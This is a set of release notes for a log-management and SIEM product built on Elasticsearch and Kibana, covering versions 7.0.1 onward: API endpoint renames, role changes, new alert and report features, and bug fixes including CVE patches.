Following endpoints deprecated and update with:
/_auth/account->/_logserver/accounts/_license/reload->/_logserver/license/reload/_role-mapping/reload->/_logserver/auth/reload/user/updatePassword->/_logserver/user/password
Following endpoint was removed and replaced with:
/_license->/_logserver/license
Breaking changes
During the update, the “kibana” role will be removed and replaced by “gui-access”, “gui-objects”, “report”. The three will automatically be assigned to all users that prior had the “kibana” role. If you had a custom role that allowed users to log in to the GUI this WILL STOP WORKING and you will have to manually enable the access for users.
The above is also true for LDAP users. If role mapping has been set for role kibana this will have to be manually updated to “gui-access” and if required “gui-objects” and “report” roles.
If any changes have been made to the “kibana” role paths, those will be moved to “gui-objects”. GUI objects permissions also will be moved to “gui-objects” for “gui-access” cannot be used as a default role.
The “gui-access” is a read-only role and cannot be modified. By default, it will allow users to access all GUI apps; to constrain user access, assign user a role with limited apps permissions.
“small_backup.sh” script changed name to “configuration-backup.sh” - this might break existing cron jobs
SIEM plan is now a separate add-on package (requires an additional license)
Network-Probe is now a separate add-on package (requires an additional license)
(SIEM) Verify rpmsave files for alert and restore them if needed for following:
/opt/alert/config.yaml
/opt/alert/op5_auth_file.yml
/opt/alert/smtp_auth_file.yml
Required post upgrade
Role “wiki” has to be modified to contain only path: “.wiki” and all methods
v7.0.6
NewFeatures
Alert: Added 5 alerts to detect SUNBURST attack
Incidents: Added the ability of transferring the calculated risk_value to be sent in any alarm method
Indidents: Added visibility of unassigned incidents based on user role - security-tenant role
install.sh: Added the ability to update with ./install.sh -u
Improvements
Object permission: Object filtering optimization
Reports: Date verification with scheduler enabled tasks
Reports: UI optimization
BugFixes
Agents: CVE-2020-28168
Alert: Fixes problem with Syslog notifications
Alert: Fixes problem with Test Rule functionality
Alert: CVE-2020-28168
Archive: CVE-2020-28168
Cerebro: CVE-2019-12384
Kibana-xlsx-import: CVE-2020-28168
Login: CVE-2020-28168
Reports: CVE-2020-28168
Reports: Fixes errors related to background tasks
Sync: CVE-2020-28168
v7.0.5
NewFeatures
New plugin: Wiki - integration with wiki.js
Agents: Added index rotation using rollover function
Alert: Added counter with information about how many rules there are in a given group
Alert: Added index rotation using rollover function
Alert: First group will be expanded by default
Alert: New Alert method for Syslog added to GUI
Archive: Added compression level support - archive.compressionOptions [kibana.yml]
Archive: Added mapping/template import support
Archive: Added number of matches in files
Archive: Added regexp and extended regexp support
Archive: Added size information of created archive on list of files for selection
Archive: Added support for archiving a selected field from the index
Archive: Added timestamp field for custom timeframe fields
Audit: Added index rotation using rollover function
Config: Added configuration possibility for Rollover (audit/alert/.agents indexes) in Settings tab
Object Permission: When deleting an object to a role in “object permission” now is possible to delete related objects at the same time
Reports: Ability to delete multiple tasks at once
Reports: Added details field for each task that includes information about: user, time range, query
Reports: Added Scheduler for “Data Export” tab
Reports: Fields to export are now alphabetical, searchable list
Reports: Scheduled tasks supports: enable, disable, delete
Reports: Scheduled tasks supports: Logo, Title, Comments, PDF/JPEG, CSV/HTML
Installation support for Centos7/8, RedHat7/8, Oracle Linux7/8, Scientific Linux 7, Centos Stream
iFrame embedding support: new directive login.isSameSite in kibana.yml [“Strict” or “None”]
Improvements
Access management: Plugin Login for app management will show itself as Config
Alert: Added support for nested fields in blacklist-ioc alert type
Alert: Alert Dashboard rewritten to alert_status pattern - allows you to filter visible alarms per user
Alert: Cardinality - fix for _thread._local’ object has no attribute ‘alerts_sent’
Alert: Chain/Logical - few improvements for output content
Alert: Rule type example is hidden by default
Alert: RunOnce - improved results output
Alert: RunOnce - information that the process has finished
Alert: TestRule - improved error output
Archive: Added document sorting, which speeds up elasticsearch response
Archive: API security -> only admin can use (previously only visual information)
Archive: Archiving process uses a direct connection, bypassing the elastfilter - proxy
Archive: Changed UTC time to local time
Archive: Information about problems with reading/writing to the archive directory
Archive: Optimized function for loading large files - improved loading time
Archive: Optimized saving method to a temporary flat file
Archive: Optimized scroll time which speeds up elasticsearch response
Audit: Converted SEARCH _id: auditselection to GET _id: auditselection
Audit: Removed background task used for refresh audit settings
Beats: Updated to v6.8.14
Blacklist-IOC: Added Duplicates removal mechanism
Blacklist-IOC: Automatic configuration of repository access during installation [install.sh]
Cerebro: Updated to v0.9.3
Config: Character validation for usernames and roles - can consist only of letters a-z, A-Z, numbers 0-9 and characters _,-
Config: Deleting a user deletes his tokens/cookies immediately and causes logging out
Config: Securing the default administrator account against deletion
Config: Session timeout redirect into login screen from all modules
Config: Workaround for automatic filling of fields with passwords in modern browsers
Curator: Updated to v5.8.3 and added support for Python3 as default
ElasticDump: Updated to v6.65.3 and added support for backup all templates at once
Elasticsearch: Removed default user “scheduler” with the admin role - is a thing of history
Elasticsearch: Removed indices.query.bool.max_clause_count from default configuration - causes performance issues
Elasticsearch: Role caching improvements
GEOIP: Automatic configuration of repository access during installation [install.sh]
Incidents: Switching to the Incidents tab creates pattern alert* if not exist
install.sh: Added workaround for cluster.max_shards_per_node=1000 bug
Kibana: Removed kibana.autocomplete from default configuration - causes performance issues
License: Revision and update of license files in all system modules
Logstash: Updated logstash-codec-sflow to v2.1.3
Logstash: Updated logstash-input-beats to v6.1.0
Logstash: Updated to v6.8.14
Logtrail: Added default actionfile for curator - to clean logtrail indexes after 2 days
Network visualization: corrected legend and better colors
Reports: Added Switch button for filtering only scheduled tasks
Reports: Admin users should see all scheduled reports from every other user
Reports: Changed “Export Dashboard” to “Report Export”
Reports: Changed “Export Task Management” to “Data Export”
Reports: Crontab format validated before Submit in Scheduler
Reports: Default task list sorted by “start time”
Reports: Improved security by using kernel namespaces - dropped suid permissions for chrome_sandbox
Reports: Moved “Schedule Export Dashboard” to “Report Export” tab
Reports: Try catch for async getScheduler function
Skimmer: Added alerts: High_lag_on_Kafka_topic, High_node_CPU_usage, High_node_HEAP_usage, High_Flush_duration, High_Indexing_time
Skimmer: New metric - _cat/shards
Skimmer: New metric - _cat/tasks
Skimmer: Updated to v1.0.17
small_backup.sh: Added sync, archive, wiki support
small_backup.sh: Information about the completed operation is logged
Wazuh: Searching in the rule.description field
BugFixes
Access Management: Cosmetic issue in apps select box for default roles (like admin, alert, intelligence, kibana etc.)
Alert: Category name did not appear on the “Risk” list
Alert: Description update for find_match alert type
Alert: Fixes bug where after renaming the alert it is not immediately visible on the list of alerts
Alert: Fixes bug where editing of alert, causes it returns to the Other group
Alert: Fixes incorrect function alertMethodData - problem with TestRule operation [itrs op5 alert-method]
Alert: Fixes problem with ‘[]’ in rule name
Alert: Fixes process status in Alert Status tab
Alert: In groups, if there is pagination, it is not possible to change the page - does not occur with the default group “Others”
Alert: Missing op5_url directive in /opt/alert/config.yaml [itrs op5 alert-method]
Alert: Missing smtp_auth_file directive in /opt/alert/config.yaml [itrs op5 alert-method]
Alert: Missing username directive in /opt/alert/config.yaml [itrs op5 alert-method]
Alert: Overwrite config files after updating, now it should create /opt/alert/config.yml.rpmnew
Archive: Fixes exception during connection problems to elasticsearch
Archive: Missing symlink to runTask.js
Cerebro: Fixes problems with PID file after cerebro crash
Cerebro: Overwrite config files after updating, now it should create /opt/cerebro/conf/application.conf.rpmnew
Config: SSO login misreads application names entered in Access Management
Elasticsearch: Fixes “No value present” message log when not using a radius auth [properties.yml]
Elasticsearch: Fixes “nullPointerException” by adding default value for licenseFilePath [properties.yml]
Incidents: Fixes problem with vanishing status
install.sh: Opens the ports required by logstash via firewall-cmd
install.sh: Set openjdk11 as the default JAVA for the operating system
Kibana: Fixes exception during connection problems to elasticsearch - will stop restarting
Kibana: Fixes URL shortening when using Store URLs in session storage
Logtrail: Fixes missing logrotate definitions for Logtrail logfiles
Logtrail: Overwrite config files after updating, now it should create /usr/share/kibana/plugins/logtrail/logtrail.json.rpmnew
Object Permission: Fixes permission verification error if the overwritten object’s title changes
Reports: Fixes Image Creation failed exception
Reports: Fixes permission problem for checkpass Reports API
Reports: Fixes problems with AD/Radius/LDAP users
Reports: Fixes problem with choosing the date for export
Reports: Fixes setting default index pattern for technical users when using https
Skimmer: Changed kafka.consumer_id to number in default mapping
Skimmer: Fixes in indices stats monitoring
Skimmer: Overwrite config files after updating, now it should create /opt/skimmer/skimmer.conf.rpmnew
v7.0.4
NewFeatures
New plugin: Archive specified indices
Applications Access management based on roles
Dashboards: Possibility to play a sound on the dashboard
Tenable.SC: Integration with dedicated dashboard
QualysGuard: Integration with dedicated dashboard
Wazuh: added installation package
Beats: added to installation package
Central Agents Management (masteragent): Stop & start & restart for each registered agent
Central Agents Management (masteragent): Status of detected beats and master agent in each registered agent
Central Agents Management (masteragent): Tab with the list of agents can be grouped
Central Agents Management (masteragent): Autorolling documents from .agents index based on a Settings in Config tab
Alert: New Alert method for op5 Monitor added to GUI.
Alert: New Alert method for Slack added to GUI.
Alert: Name-change - the ability to rename an already created rule
Alert: Groups for different alert types
Alert: Possibility to modify all alarms in selected group
Alert: Calendar - calendar for managing notifications
Alert: Escalate - escalate alarm after specified time
Alert: TheHive integration
Improvements
Object Permission: When adding an object to a role in “object permission” now is possible to add related objects at the same time
Skimmer: New metric - increase of documents in a specific index
Skimmer: New metric - size of a specific index
Skimmer: New metric - expected datanodes
Skimmer: New metric - kafka offset in Kafka cluster
Installation script: The setup script validates the license
Installation script: Support for Centos 8
AD integration: Domain selector on login page
Incidents: New fieldsToSkipForVerify option for skipping false-positives
Alert: Added sorting of labels in comboxes
User Roles: Alphabetical, searchable list of roles
User Roles: List of users assigned to a given role
Audit: Cache for audit settings (performance)
Diagnostic-tool.sh: Added cerebro to audit files
Alert Chain/Logical: Few improvements
BugFixes
Role caching fix for working in multiple node setup.
Alert: Aggregation schedule time
Alert: Loading new_term fields
Alert: RecursionError: maximum recursion depth exceeded in comparison
Alert: Match_body.kibana_discover_url malfunction in aggregation
Alert: Dashboard Recovery from Alert Status tab
Reports: Black bars after JPEG dashboard export
Reports: Problems with Scheduled reports
Elasticsearch-auth: Forbidden - not authorized when querying an alias with a wildcard
Dashboards: Logserver_table is not present in 7.X, it has been replaced with basic table
Logstash: Mikrotik pipeline - failed to start pipeline
v7.0.3
NewFeatures
Alert: new type - Chain - create alert from underlying rules triggered in defined order
Alert: new type - Logical - create alert from underlying rules triggered with defined logic (OR,AND,NOR)
Alert: correlate alerts for Chain and Logical types - alert is triggered only if each rule return same value (ip, username, process etc)
Alert: each triggered alert is indexed with uniqe alert_id - field added to default field schema
Alert: Processing Time visualization on Alert dashboard - easy to identify badly designed alerts
Alert: support for automatic search link generation
Input: added mikrotik parsing rules
Auditing : added IP address field for each action
Auditing : possibility to exclude values from auditing
Skimmer: indexing rate visualization
Skimmer: new metric: offset in Kafka topics
SKimmer: new metric: expected-datanodes
MasterAgent: added possibility for beats agents restart and the master agent itself (GUI)
Improvements
Search and sort support for User List in Config section
Copy/Sync: now supports “insecure” mode (operations without certificates)
Fix for “add sample data & web sample dashboard” from Home Page -> changes in default-base-template
Skimmer: service status check rewriteen to dbus api
Masteragent: possibility to exclude older SSL protocols
Masteragent: now supports Centos 8 and related distros
XLSX import: updated to 7.6.1
Logstash: masteragent pipeline shipped by default
Blacklist: Name field and Field names in the Fields column & Default field exclusions
Blacklist: runOnce is only killed on a fatal Alert failure
Blacklist: IOC excludes threats marked as false-positive
Incidents: new design for Preview
Incidents: Note - new feature, ability to add notes to incidents
Risks: possibility to add new custom value for risk, without the need to index that value
Alert: much better performance with multithread support - now default
Alert: Validation of email addresses in the Alerts plugin
Alert: “Difference” rule description include examples for alert recovery function
Logtrail: improved the beauty and readability of the plugin
Security: jquery updated to 3.5.1
Security: bootstrap updated to 4.5.0
The HELP button (in kibana) now leads to the official product documentation
Centralization of previous alert code changes to single module
BugFixes
Individual special characters caused problems in user passwords
Bad permissions for scheduler of Copy/Sync module has been corrected
Wrong Alert status in the alert status tab
Skimmer: forcemerge caused under 0 values for cluster_stats_indices_docs_per_sec metric
diagnostic-tool.sh: wrong name for the archive in output
Reports: export to csv support STOP action
Reports: scroll errors in csv exports
Alert: .alertrules is not a required index for proper system operation
Alert: /opt/alerts/testrules is not a required directory for proper system operation
Alert: .riskcategories is not a required index for proper system operation
Malfunction in Session Timeout
Missing directives service_principal_name in bundled properties.yml
Blacklist: Removal of the doc type in blacklist template
Blacklist: Problem with “generate_kibana_discover_url: true” directive
Alert: Overwriting an alert when trying to create a new alert with the same name
Reports: When exporting dashboards, PDF generates only one page or cuts the page
Wrong product logo when viewing dashboards in full screen mode
v7.0.2
NewFeatures
Manual incident - creating manual incidents from the Discovery section
New kibana plugin - Sync/Copy between clusters
Alert: Analyze historical data with defined alert
Indicators of compromise (IoC) - providing blacklists based on Malware Information Sharing Platform (MISP)
Automatic update of MaxMind GeoIP Databases [asn, city, country]
Extended LDAP support
Cross cluster search
Diagnostic script to collect information about the environment, log files, configuration files - utils/diagnostic-tool.sh
New beat: op5beat - dedicated data shipper from op5 Monitor
Improvements
Added
_licenseAPI for elasticsearch (it replaceslicensepath which is now deprecated and will stop working in future releases)_licenseAPI now shows expiration_date and days_leftVisual indicator on Config tab for expiring license (for 30 days and less)
Creating a new user now requires reentering the passoword
Complexity check for password fields
Incidents can be supplemented with notes
Alert Spike: more detailed description of usage
ElasticDump added to base installation - /usr/share/kibana/elasticdump
Alert plugin updated - frontend
Reimplemented session timeout for user activity
Skimmer: new metrics and dashboard for Cluster Monitoring
Wazuh config/keys added to small_backup.sh script
Logrotate definitions for Logtrail logfiles
Incidents can be sorted by Risk value
UTF-8 support for credentials
Wazuh: wrong document_type and timestamp field
BugFixes
Audit: Missing Audit entry for succesfull SSO login
Report: “stderr maxBuffer length exceeded” - export to csv
Report: “Too many scroll contexts” - export to csv
Intelligence: incorrect work in updated environments
Agents: fixed wrong document type
Kibana: “Add Data to Kibana” from Home Page
Incidents: the preview button uses the wrong index-pattern
Audit: Missing information about login errors of ad/ldap users
Netflow: fix for netflow v9
MasterAgent: none/certificade verification mode should work as intended
Incorrect CSS injections for dark theme
The role could not be removed in specific scenarios
v7.0.1
init
migrated features from branch 6 [ latest:6.1.8 ]
XLSX import [kibana]
curator added to /usr/share/kibana/curator
node_modules updated! [kibana]
elasticsearch upgraded to 7.3.2
kibana upgraded to 7.3.2
dedicated icons for all kibana modules
eui as default framework for login,raports
bugfix: alerts type description fix